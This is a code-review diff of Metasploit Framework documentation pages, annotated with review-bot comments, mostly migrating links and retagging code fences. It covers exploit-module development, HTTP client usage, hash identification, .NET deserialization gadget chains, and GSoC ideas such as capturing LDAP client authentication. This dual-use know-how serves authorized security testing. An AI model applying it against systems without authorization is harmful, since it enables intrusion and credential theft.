Once you have gone through all of the steps above you should be ready to submit your PR. To submit your PR, first check which
branch points to your copy of the code. If you have followed the setup guide, it should be `origin`. You can double check this
branch's remote URL using `git remote get-url origin`. It should look something like `git@github.com:gwillcox-r7/metasploit-framework`
with `gwillcox-r7` substituted for your username.
Assuming the `origin` branch is in fact pointing to your copy of the code, run `git push origin local-branch:remote-branch`
and replace `local-branch` with the branch locally where your code changes are located, and `remote-branch` with what
you want this branch to be called on the remote repository, aka `origin` which will be your fork on GitHub.com. In most
cases you will want these two names to be the same to avoid confusion, but its good to know this syntax should you
Assuming the `origin` branch is in fact pointing to your copy of the code, run `git push origin local-branch:remote-branch`
and replace `local-branch` with the branch locally where your code changes are located, and `remote-branch` with what
you want this branch to be called on the remote repository, aka `origin` which will be your fork on GitHub.com. In most
cases you will want these two names to be the same to avoid confusion, but its good to know this syntax should you
start working with more complex situations. Note that if the branch pointing to your copy of the code is not named `origin`,
replace the word `origin` in the command above with the name of the branch that does point to your copy of the code.
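Review bot: the same remote/branch confusion as earlier in this page: "check which branch points to your copy of the code. If you have followed the setup guide, it should be `origin`" and "the `origin` branch" describe a remote, and `git remote get-url origin` queries a remote. Since this hunk reflows these exact lines, replace "branch" with "remote" in the three places it refers to `origin`, and in the last sentence "the name of the branch that does point to your copy" likewise.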
@@ -114,10 +114,10 @@ Compressing objects: 100% (8/8), done.
Writing objects: 100% (8/8), 1.55 KiB | 1.55 MiB/s, done.
Total 8 (delta 7), reused 0 (delta 0), pack-reused 0
remote: Resolving deltas: 100% (7/7), completed with 7 local objects.
remote:
remote:
remote: Create a pull request for 'update_mssql_lib_parameters' on GitHub by visiting:
remote: https://github.com/gwillcox-r7/metasploit-framework/pull/new/update_mssql_lib_parameters
remote:
remote:
To github.com:gwillcox-r7/metasploit-framework
* [new branch] update_mssql_lib_parameters -> update_mssql_lib_parameters
```
@@ -12,7 +12,7 @@ compatibility of each.
| Gadget Chain Name | BinaryFormatter | LosFormatter | SoapFormatter |
| --------------------------- | --------------- | ------------ | ------------- |
| ClaimsPrincipal | Yes | Yes | Yes |
| ClaimsPrincipal | Yes | Yes | Yes |
| TextFormattingRunProperties | Yes | Yes | Yes |
| TypeConfuseDelegate | Yes | Yes | No |
| WindowsIdentity | Yes | Yes | Yes |
@@ -134,5 +134,5 @@ payloads such as Meterpreter.
[5]: https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/util/dot_net_deserialization/types
[6]: https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/util/dot_net_deserialization.rb
[7]: https://github.com/rapid7/metasploit-framework/blob/master/spec/lib/msf/util/dot_net_deserialization_spec.rb
[8]: https://github.com/rapid7/metasploit-framework/wiki/How-to-use-command-stagers
[9]: https://github.com/rapid7/metasploit-framework/wiki/How-to-use-Powershell-in-an-exploit
[8]: https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-use-command-stagers.html
[9]: https://docs.metasploit.com/docs/development/developing-modules/libraries/how-to-use-powershell-in-an-exploit.html
@@ -12,8 +12,10 @@ The pgp signatures below can be verified with the following [public key](https:/
|Download Link|File Type|SHA1|PGP|
|-|-|-|-|
| [metasploit-4.21.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)|
| [metasploit-4.21.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.asc)|
| [metasploit-4.22.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)|
| [metasploit-4.22.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.asc)|
| [metasploit-4.21.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe.asc)|
| [metasploit-4.21.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-linux-x64-installer.run.asc)|
| [metasploit-4.21.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe.asc)|
| [metasploit-4.21.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-linux-x64-installer.run.asc)|
| [metasploit-4.20.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-windows-x64-installer.exe.asc)|
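Review bot: the two new 4.22.0 rows point at the unversioned metasploit-latest-* URLs (and their .sha1 and .asc siblings), while the 4.21.1 rows that were demoted in this same hunk use the pinned archive/metasploit-4.21.1-2023011701-* form. The 4.22.0 label will silently resolve to a different installer and a different SHA1/PGP file as soon as the next release replaces "latest". Give 4.22.0 its pinned archive URL as well, and if a "latest" row is wanted, label it as latest rather than with a version number.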
@@ -0,0 +1,61 @@
GSoC Project Ideas in no particular order. When you've picked one, take a look at [[How-to-Apply-to-GSoC]] for how to make a proposal.
Mentors: @jmartin-r7, @gwillcox-r7
Slack Contacts: @Op3n4M3, @gwillcox-r7 on [Metasploit Slack](https://metasploit.slack.com/)
For any questions about these projects reach out on the Metasploit Slack in the `#gsoc` channel or DM one of the mentors using the Slack contacts listed above. Note that mentors may be busy so please don't expect an immediate response, however we will endeavor to respond as soon as possible. If you'd prefer not to join Slack, you can also email `msfdev [@] metasploit [dot] com` and we will respond to your questions there if email is preferable.
## Enhance Metasploit Framework
### Rest API Pagination
Metasploit provides two API interaction services, a Rest API service and an RPC service. Previous efforts have wrapped and exposed the RPC service as JSON responses available from the Rest API endpoint. This wrapping did not account for possible large responses that may benefit from pagination. A previous contributor attempted to add this functionality for a [limited set of RCP commands](https://github.com/rapid7/metasploit-framework/pull/13439) however review identified that the changes would introduce changes to the documented public API and also introduce inconsistency within the API responses resulting in a fluctuating public API. Modern pagination would be beneficial to increasing user adoption of Rest API services provided it can be implemented consistently and either maintain compatibility of the existing public RPC service or generate a one time migration across all exposed public APIs.
Size: Large
Difficulty: 4/5
### LDAP Capture Capabilities
Metasploit's LDAP service mixin provides a service to enable interaction over the LDAP protocol. The current implementation is the bare minimum to enable support for attacking the [2021 Log4Shell vulnerability](). Enhancement/Extension of the mixin to enable various additional LDAP features would enable extended usage of this service for additional tasks. Support for various protocol level authentication methods would allow Metasploit to intercept and log authentication information. Specific items of interest are [SPNEGO](https://en.wikipedia.org/wiki/SPNEGO) and [StartTLS](https://ldapwiki.com/wiki/StartTLS) support to enable compatibility with the widest variety of clients and a new capture module that log authentication information from clients.
Size: Medium
Difficulty: 3/5
### Enhanced LDAP Query & Collection
When preforming security assessment on a network with centralized login such as LDAP or Active Directory these services are sometimes exposed directly on the network. While Metasploit has capabilities to collect various pieces of information from these services when a user has been able to gain code execution inside a target system by utilizing tooling such as `Sharphound` or by leveraging SMB services via the `secrets_dump` module, these methods are somewhat indirect. A network base capability to query exposed services may have value. An interactive terminal plugin allowing users to connect directly to LDAP or Active Directory providing capabilities similar to the existing `requests` plugin could enable users search for valuable information in these services without the need to compromise a target or interact with a secondary service.
Size: Medium/Large (Depends on proposal)
Difficulty: 3/5
### Improving post-exploit API to be more consistent, work smoothly across session types
The Metasploit post-exploitation API is intended to provide a unified interface between different Meterpreter, shell, PowerShell, mainframe, and other session types. However, there are areas where the implementation is not consistent, and could use improvements:
* Shell sessions do not implement the filesystem API that Meterpreter sessions have
* When a shell session is in a different language, e.g. Windows in French, the post API does not find the expected output. Add localization support for these.
* Simple commands like 'cmd_exec' are fast in Shell sessions but are relatively slow in Meterpreter sessions. Add an API to make Meterpreter run simple commands more easily.
Size: Medium/Large (Depends on proposal)
Difficulty: Varies
### Improve the web vulnerability API
This would follow up on the Arachni plugin PR <https://github.com/rapid7/metasploit-framework/pull/8618> and improve the Metasploit data model to better represent modern web vulnerabilities. This project would require knowledge of data models, types of modern web vulnerabilities, and experience with web app security scanners.
Size: Large
Difficulty: 4/5
### Data Visualization
Enhance existing Metasploit Goliath dashboard that allows observation of an active engagement. Data visualization would include, but not be limited to: host node graph with activity indicators and heat maps. The main idea here is to create a visualization tool that helps users understand data that has been gathered into Metasploit during usage in some useful way. Proposals should note where the service will live, how a user will use the service, and how you will provide a maintainable and extendable consumer for the data that is exposed.
See [Metasploit 'Goliath' Demo (msf-red)](https://www.youtube.com/watch?v=hvuy6A-ie1g&feature=youtu.be&t=176) for a demo video of Goliath in action. You can also read more on Metasploit Goliath at [Metasploit-Data-Service-Enhancements-(Goliath)](./Metasploit-Data-Service-Enhancements-Goliath)
Size: Medium/Large (Depends on proposal)
Difficulty 3/5
## Submit your own
If you want to suggest your own idea, please discuss it with us first on [Slack](https://metasploit.com/slack) in the `#gsoc` channel to make sure it is a reasonable amount of work for a summer and that it fits the goals of the project.
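Review bot: the Goliath link on the `See [Metasploit 'Goliath' Demo (msf-red)]` line uses a bare relative path, `./Metasploit-Data-Service-Enhancements-Goliath`, with no `.md` extension and not the `[[title|./Page.md]]` form used for the other converted links in this change (compare `[[here|./Creating-Metasploit-Framework-LoginScanners.md]]` further down), so it may not resolve on the docs site; make it consistent with the rest. While this file is being edited, the LDAP/AD paragraph has `preforming` for `performing`, `A network base capability` for `network-based`, and `enable users search` is missing `to`.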
@@ -27,9 +27,9 @@ The Metasploit Framework has seven different rankings to indicate how reliable a
## Template
If you have read this far, we think you are pretty impressive because it's a lot to digest. You are probably wondering why we haven't had a single line of code to share in the writeup. Well, as you recall, exploit development is mostly about your reversing skills. If you have all that, we shouldn't be telling you how to write an exploit. What we've done so far is hopefully get your mindset dialed-in correctly about what it means to become a Metasploit exploit developer for the security community; the rest is more about how to use our mixins to build that exploit. Well, there are A LOT of mixins, so it's impossible to go over all of them in a single page, so you must either read the [API documentation](https://rapid7.github.io/metasploit-framework/api/), existing [code examples](https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits), or look for more wiki pages we've written to cover specific mixins.
If you have read this far, we think you are pretty impressive because it's a lot to digest. You are probably wondering why we haven't had a single line of code to share in the writeup. Well, as you recall, exploit development is mostly about your reversing skills. If you have all that, we shouldn't be telling you how to write an exploit. What we've done so far is hopefully get your mindset dialed-in correctly about what it means to become a Metasploit exploit developer for the security community; the rest is more about how to use our mixins to build that exploit. Well, there are A LOT of mixins, so it's impossible to go over all of them in a single page, so you must either read the [API documentation](https://docs.metasploit.com/api/), existing [code examples](https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits), or look for more wiki pages we've written to cover specific mixins.
For example, if you're looking for a writeup about how to interact with an HTTP server, you might be interested in: [How to send an HTTP Request Using HTTPClient](https://github.com/rapid7/metasploit-framework/wiki/How-to-Send-an-HTTP-Request-Using-HTTPClient). If you're interested in browser exploit writing, definitely check out: [How to write a browser exploit using BrowserExploitServer](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit-using-BrowserExploitServer), etc.
For example, if you're looking for a writeup about how to interact with an HTTP server, you might be interested in: [[How to send an HTTP Request Using HTTPClient|./How-to-write-a-browser-exploit-using-HttpServer.md]]. If you're interested in browser exploit writing, definitely check out: [[How to write a browser exploit using BrowserExploitServer|./How-to-write-a-browser-exploit-using-BrowserExploitServer.md]], etc.
But of course, to begin, you most likely need a template to work with, and here it is. We'll also explain how to fill out the required fields:
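Review bot: the link titled `How to send an HTTP Request Using HTTPClient` now targets `./How-to-write-a-browser-exploit-using-HttpServer.md`, which is the HttpServer browser-exploit page, not the HttpClient page; elsewhere in this change the same title is resolved to `./How-to-Send-an-HTTP-Request-Using-HttpClient.md`, so use that target here.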
@@ -289,7 +289,7 @@ end
msfconsole output:
```
```msf
msf6 exploit(windows/smb/msf_smb_client_test) > options
Module options (exploit/windows/smb/msf_smb_client_test):
@@ -406,7 +406,7 @@ end
msfconsole output:
```
```msf
msf6 exploit(windows/smb/ruby_smb_client_test) > options
Module options (exploit/windows/smb/ruby_smb_client_test):
@@ -1,6 +1,6 @@
# Intro
This article will discuss the various libraries, dependencies, and functionality built in to metasploit for dealing with password hashes, and cracking them. In general, this will not cover storing credentials in the database, which can be read about [here](https://github.com/rapid7/metasploit-framework/wiki/Creating-Metasploit-Framework-LoginScanners#the-scan-block). Metasploit currently support cracking passwords with [John the Ripper](https://github.com/rapid7/metasploit-framework/tree/master/modules/auxiliary/analyze) and [hashcat](https://github.com/rapid7/metasploit-framework/pull/11695).
This article will discuss the various libraries, dependencies, and functionality built in to metasploit for dealing with password hashes, and cracking them. In general, this will not cover storing credentials in the database, which can be read about [[here|./Creating-Metasploit-Framework-LoginScanners.md]]. Metasploit currently support cracking passwords with [John the Ripper](https://github.com/rapid7/metasploit-framework/tree/master/modules/auxiliary/analyze) and [hashcat](https://github.com/rapid7/metasploit-framework/pull/11695).
# Hashes
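Review bot: the new `[[here|./Creating-Metasploit-Framework-LoginScanners.md]]` link drops the `#the-scan-block` fragment the old URL carried, so the reader lands at the top of the page rather than on the section about storing credentials; keep the fragment (`./Creating-Metasploit-Framework-LoginScanners.md#the-scan-block`) if the wiki-link syntax allows it. Since the line is being rewritten anyway, `Metasploit currently support` should read `supports`.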
@@ -9,7 +9,7 @@ Many modules dump hashes from various software. Anything from the OS: [Windows]
## Hash Identify Example
In this first, simple, example we will simply show loading the library and calling its function.
```
```ruby
require 'metasploit/framework/hashes/identify'
puts identify_hash "$1$28772684$iEwNOgGugqO9.bIz5sk8k/"
# note, bad hashes return an empty string since nil is not accepted when creating credentials in msf.
@@ -17,7 +17,7 @@ puts identify_hash "This_is a Fake Hash"
puts identify_hash "_9G..8147mpcfKT8g0U."
```
In practice, we receive the following output from this:
```
```ruby
msf5 > irb
[*] Starting IRB shell...
[*] You are in the "framework" object
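Review bot: the fence retagged ```ruby in this hunk wraps an msfconsole transcript (`msf5 > irb`, `[*] Starting IRB shell...`), not Ruby source; the rest of this change tags console output ```msf, so use ```msf here and keep ```ruby for the `identify_hash` snippet in the previous hunk.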
@@ -1,8 +1,8 @@
Welcome to Metasploit-land. Are you a Metasploit user who wants to get started or get better at hacking stuff (that you have permission to hack)? The quickest way to get started is to [download the Metasploit nightly installers](https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers). This will give you access to both the free, open-source Metasploit Framework and a free trial of Metasploit Pro.
Welcome to Metasploit-land. Are you a Metasploit user who wants to get started or get better at hacking stuff (that you have permission to hack)? The quickest way to get started is to [[download the Metasploit nightly installers|./Nightly-Installers.md]]. This will give you access to both the free, open-source Metasploit Framework and a free trial of Metasploit Pro.
If you're using [Kali Linux](https://kali.org/), Metasploit is already pre-installed. See the [Kali documentation](https://kali.org/docs/tools/starting-metasploit-framework-in-kali/) for how to get started using Metasploit in Kali Linux.
Are you anxious to get your [Metasploit Development Environment](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment) set up so you can start [[Landing Pull Requests]] and contributing excellent exploit code? If so, you're in the right place. If you're an exploit developer, you will want to review our [[Guidelines for Accepting Modules and Enhancements]] to find out what we expect when we see pull requests for new Metasploit modules. No idea what you should start working on? Check out the guidelines for [[contributing to Metasploit]], and dive into [[Setting Up a Metasploit Development Environment]].
Are you anxious to get your [[Metasploit Development Environment|./dev/Setting-Up-a-Metasploit-Development-Environment.md]] set up so you can start [[Landing Pull Requests]] and contributing excellent exploit code? If so, you're in the right place. If you're an exploit developer, you will want to review our [[Guidelines for Accepting Modules and Enhancements]] to find out what we expect when we see pull requests for new Metasploit modules. No idea what you should start working on? Check out the guidelines for [[contributing to Metasploit]], and dive into [[Setting Up a Metasploit Development Environment]].
# Getting Started #
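Review bot: on the `Are you anxious to get your ...` line only the first link is converted to the `[[title|./dev/Setting-Up-a-Metasploit-Development-Environment.md]]` form, while `[[Landing Pull Requests]]`, `[[Guidelines for Accepting Modules and Enhancements]]`, `[[contributing to Metasploit]]` and `[[Setting Up a Metasploit Development Environment]]` stay as bare wiki-links on the same line. Either the bare form resolves on the new site, in which case the explicit path is not needed, or it does not, in which case the other four need converting too; note also that the line links the development-environment page twice.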
@@ -7,7 +7,7 @@ An updated list of the application timeline can be found at https://developers.g
## Important Dates
- GSoC Applications Open: April 4th at 1800 UTC
- GSoC Applications Open: April 4th at 1800 UTC
- GSoC Applications Close: April 19th at 1800 UTC for 2022 GSoC applications. **No late submissions will be accepted, period.**
- Accepted applications announced: May 20th at 1800 UTC
- Programming Starts: June 13th.
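Review bot: the removed and added `GSoC Applications Open: April 4th at 1800 UTC` lines are identical in the rendered diff, so this hunk changes only whitespace (the `Students interesting in GSoC` and `Skillz` hunks below have the same pattern). If this is deliberate trailing-whitespace cleanup, say so in the commit message; otherwise leave these hunks out of a link-migration change.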
@@ -19,14 +19,14 @@ An updated list of the application timeline can be found at https://developers.g
You can find the current list of GSoC ideas at [[GSoC-2022-Project-Ideas]]. Please see the note at the bottom of this page if you are interested in submitting your own idea, as this will require approval.
# Getting started
Students interesting in GSoC, can start by reading Google's official guides.
Students interesting in GSoC, can start by reading Google's official guides.
<https://developers.google.com/open-source/gsoc/help/student-advice>
Review all of the [student guide](https://google.github.io/gsocguides/student/) and carefully read the [proposal writing section](https://google.github.io/gsocguides/student/writing-a-proposal.html).
A listed `idea` is a seed for GSoC students to expand on and propose how to design and implement a solution. You can start by investigating the code base and how existing users interaction with `msfconsole` functionality. Think through scenarios on how a user might want to interact with the proposed idea.
A place to get started with contributing to Metasploit is [here](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md) and expanded on [here](https://github.com/rapid7/metasploit-framework/wiki/Contributing-to-Metasploit#framework-bugs-and-features).
A place to get started with contributing to Metasploit is [here](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md) and expanded on [[here|./Contributing-to-Metasploit.md]].
GSoC mentors tend to look for those items that have a chance of making development and usage easier or improving the overall performance of a certain area, however by starting with understanding the most common contribution pattern you can get familiar with the codebase and also the mindset of users. This will help you in creating a proposal with the end user in mind.
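Review bot: the `expanded on` link loses the `#framework-bugs-and-features` fragment the old URL had, so it no longer points at the specific section; append the fragment to `./Contributing-to-Metasploit.md` if the wiki-link syntax supports it. The `Students interesting in GSoC, can start by reading` line is touched by this hunk as well, so fix `interesting` to `interested` and drop the comma after `GSoC` while here.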
@@ -50,14 +50,14 @@ A brief description of what you would like to work on. See [[GSoC-2022-Project-I
## Skillz
What programming languages are you familiar with, in order of proficiency? Most of Metasploit is written in Ruby; for any project you will most likely need at least a passing knowledge of it. If you want to work on Meterpreter or Mettle, C will be necessary as well.
What programming languages are you familiar with, in order of proficiency? Most of Metasploit is written in Ruby; for any project you will most likely need at least a passing knowledge of it. If you want to work on Meterpreter or Mettle, C will be necessary as well.
What other projects have you worked on before?
## Your project
Fill in the details. What exactly do you want to accomplish?
Fill in the details. What exactly do you want to accomplish?
# Past Submissions
If you are interested in looking at past accepted submissions and projects, you can find them at https://summerofcode.withgoogle.com/archive, and clicking on any year from 2017 onwards (with the exception of 2019 as Metasploit did not participate this year). Then click on the `Security` tag, and search for `Metasploit`. Scroll down to the bottom and you will see past successful applications and the associated code for each successful submission. Submissions from 2020 onwards also include copies of the proposal that was sent in by the accepted contributor.
@@ -1,16 +1,16 @@
The [HttpClient mixin](https://rapid7.github.io/metasploit-framework/api/Msf/Exploit/Remote/HttpClient) can be included with an exploit module in order to facilitate easier HTTP communications with a target machine.
The [HttpClient mixin](https://docs.metasploit.com/api/Msf/Exploit/Remote/HttpClient) can be included with an exploit module in order to facilitate easier HTTP communications with a target machine.
## There are mainly two common methods you will see:
* **[send\_request\_raw](https://rapid7.github.io/metasploit-framework/api/Msf/Exploit/Remote/HttpClient.html#send_request_raw-instance_method)** - You use this to send a raw HTTP request. Usually, you will want this method if you need something that violates the specification; in most other cases, you should prefer `send_request_cgi`. If you wish to learn about how this method works, look at the documentation for [`Rex::Proto::Http::Client#request_raw`](https://rapid7.github.io/metasploit-framework/api/Rex/Proto/Http/Client.html#request_raw-instance_method).
* **[send\_request\_raw](https://docs.metasploit.com/api/Msf/Exploit/Remote/HttpClient.html#send_request_raw-instance_method)** - You use this to send a raw HTTP request. Usually, you will want this method if you need something that violates the specification; in most other cases, you should prefer `send_request_cgi`. If you wish to learn about how this method works, look at the documentation for [`Rex::Proto::Http::Client#request_raw`](https://docs.metasploit.com/api/Rex/Proto/Http/Client.html#request_raw-instance_method).
Here's a basic example of how to use `send_request_raw`:
```ruby
send_request_raw({'uri'=>'/index.php'})
```
* **[send\_request\_cgi](https://rapid7.github.io/metasploit-framework/api/Msf/Exploit/Remote/HttpClient.html#send_request_cgi-instance_method)** - You use this to send a more CGI-compatible HTTP request. If your request contains a query string (or POST data), then you should use this. If you wish to learn about how this method works, check out [`Rex::Proto::Http::Client#request_cgi`](https://rapid7.github.io/metasploit-framework/api/Rex/Proto/Http/Client.html#request_cgi-instance_method).
* **[send\_request\_cgi](https://docs.metasploit.com/api/Msf/Exploit/Remote/HttpClient.html#send_request_cgi-instance_method)** - You use this to send a more CGI-compatible HTTP request. If your request contains a query string (or POST data), then you should use this. If you wish to learn about how this method works, check out [`Rex::Proto::Http::Client#request_cgi`](https://docs.metasploit.com/api/Rex/Proto/Http/Client.html#request_cgi-instance_method).
@@ -31,7 +31,7 @@ send_request_cgi({
## Cookies & CookieJars
Part of send\_request\_cgi functionality is the ability to collect, edit, and send cookies via the HttpClient's `cookie_jar` variable, an instance of the [HttpCookieJar](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/remote/http/http_cookie_jar.rb) class.
Part of send\_request\_cgi functionality is the ability to collect, edit, and send cookies via the HttpClient's `cookie_jar` variable, an instance of the [HttpCookieJar](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/remote/http/http_cookie_jar.rb) class.
A HttpCookieJar is a collection of [HttpCookie](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/remote/http/http_cookie.rb). The Jar can be populated manually with it's `add` method, or automatically via the `keep_cookies` option that can be passed to [send\_request\_cgi](https://github.com/rapid7/metasploit-framework/blob/92d981fff2b4a40324969fd1d1744219589b5fa3/lib/msf/core/exploit/remote/http_client.rb#L385).
@@ -59,7 +59,7 @@ res = @http_client.send_request_cgi({
}
})
```
The cookies returned by the server with a successful login need to be attached to all future requests, so `'keep_cookies' => true,` is used to add all returned cookies to the HttpClient CookieJar and attach them to all subsequent requests.
The cookies returned by the server with a successful login need to be attached to all future requests, so `'keep_cookies' => true,` is used to add all returned cookies to the HttpClient CookieJar and attach them to all subsequent requests.
### `cookie` option
Shown below is the request used to login to a gitlab account in the [artical\_proxy\_auth\_bypass\_service\_cmds\_peform\_command\_injection module](https://github.com/rapid7/metasploit-framework/blob/92d981fff2b4a40324969fd1d1744219589b5fa3/modules/exploits/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.rb#L115)
@@ -136,7 +136,7 @@ register_options(
)
```
**2** - Load your TARGETURI with [`target_uri`](https://rapid7.github.io/metasploit-framework/api/Msf/Exploit/Remote/HttpClient.html#target_uri-instance_method), that way the URI input validation will kick in, and then you get a real `URI` object:
**2** - Load your TARGETURI with [`target_uri`](https://docs.metasploit.com/api/Msf/Exploit/Remote/HttpClient.html#target_uri-instance_method), that way the URI input validation will kick in, and then you get a real `URI` object:
In this example, we'll just load the path:
@@ -144,7 +144,7 @@ In this example, we'll just load the path:
uri = target_uri.path
```
**3** - When you want to join another URI, always use [`normalize_uri`](https://rapid7.github.io/metasploit-framework/api/Msf/Exploit/Remote/HttpClient.html#normalize_uri-instance_method):
**3** - When you want to join another URI, always use [`normalize_uri`](https://docs.metasploit.com/api/Msf/Exploit/Remote/HttpClient.html#normalize_uri-instance_method):
Example:
@@ -38,7 +38,7 @@ register_options(
### Fixed filename
Occasionally, you might not want your user to change the filename at all. A lazy trick to do that is by modifying the ```FILENAME``` datastore option at runtime, but this is very much not recommended. In fact, if you do this, you will not pass [msftidy](https://github.com/rapid7/metasploit-framework/wiki/Guidelines-for-Accepting-Modules-and-Enhancements#module-additions). Instead, here's how it's done properly:
Occasionally, you might not want your user to change the filename at all. A lazy trick to do that is by modifying the ```FILENAME``` datastore option at runtime, but this is very much not recommended. In fact, if you do this, you will not pass [[msftidy|./Guidelines-for-Accepting-Modules-and-Enhancements.md]]. Instead, here's how it's done properly:
1 - Deregister the ```FILENAME``` option
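Review bot: the msftidy link loses the `#module-additions` fragment from the old URL; the sentence is about a specific msftidy rule, so keep the section reference on `./Guidelines-for-Accepting-Modules-and-Enhancements.md` if fragments are supported in the wiki-link form.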
@@ -35,7 +35,7 @@ DEPRECATION_REPLACEMENT = 'exploit/linux/http/dlink_upnp_exec_noauth'
When the user loads that module, they should see a warning like this:
```
```msf
msf > use exploit/windows/misc/test
[!] ************************************************************************
@@ -77,4 +77,4 @@ class MetasploitModule < Msf::Exploit::Remote
end
end
```
```
@@ -2,7 +2,7 @@ This is an update of the original blog post about how to get Oracle support work
Due to licensing issues, we cannot ship Oracle's proprietary client access libraries by default. As a result, you may see this error when running a Metasploit module:
```
```msf
msf auxiliary(oracle_login) > run
[-] Failed to load the OCI library: cannot load such file -- oci8
@@ -11,7 +11,7 @@ msf auxiliary(oracle_login) > run
msf auxiliary(oracle_login) > run
```
or
```
```msf
msf5 auxiliary(scanner/oracle/oracle_hashdump) > run
[-] Failed to load the OCI library: cannot load such file -- oci8
@@ -159,4 +159,4 @@ install oci8.rb /opt/metasploit/ruby/lib/ruby/site_ruby/2.5.0/
[...]
<--- ext
root@kali:~/ruby-oci8-ruby-oci8-2.2.7#
```
```
@@ -2,4 +2,4 @@
I tricked you. We don't let anybody write Meterpreter scripts anymore, therefore we will no longer teach you how.
[You should try writing post modules instead](https://github.com/rapid7/metasploit-framework/wiki/How-to-get-started-with-writing-a-post-module).
[[You should try writing post modules instead|./How-to-get-started-with-writing-a-post-module.md]].
@@ -32,7 +32,7 @@ So you know how in Lord of the Rings, people are totally obsessed with the One R
You can use the ```session``` method to access the session object, or its alias ```client```. The best way to interact with one is via irb, here's an example of how:
```
```msf
msf exploit(handler) > run
[*] Started reverse handler on 192.168.1.64:4444
@@ -15,7 +15,7 @@ msf > irb
By default, all the log errors are on level 0 - the least informative level. But of course, you can change this by setting the datastore option, like this:
```
```msf
msf > setg LogLevel 3
LogLevel => 3
msf >
@@ -1,9 +1,9 @@
**Note: This documentation may need to be vetted.**
# How to send an HTTP request using Rex::Proto::Http::Client
The Rex library (Ruby Extension Library) is the most fundamental piece of the Metasploit Framework architecture. Modules normally do not interact with Rex directly, instead they depend on the framework core and its mixins for better code sharing. If you are a Metasploit module developer, the [lib/msf/core](https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/core) directory should be more than enough for most of your needs. If you are writing a module that speaks HTTP, then the [Msf::Exploit::Remote::HttpClient](https://github.com/rapid7/metasploit-framework/wiki/How-to-Send-an-HTTP-Request-Using-HTTPClient) mixin (which is found in [lib/msf/core/exploit/http/client](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/http/client.rb)) is most likely the one you want.
The Rex library (Ruby Extension Library) is the most fundamental piece of the Metasploit Framework architecture. Modules normally do not interact with Rex directly, instead they depend on the framework core and its mixins for better code sharing. If you are a Metasploit module developer, the [lib/msf/core](https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/core) directory should be more than enough for most of your needs. If you are writing a module that speaks HTTP, then the [[Msf::Exploit::Remote::HttpClient|./How-to-Send-an-HTTP-Request-Using-HttpClient.md]] mixin (which is found in [lib/msf/core/exploit/http/client](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/http/client.rb)) is most likely the one you want.
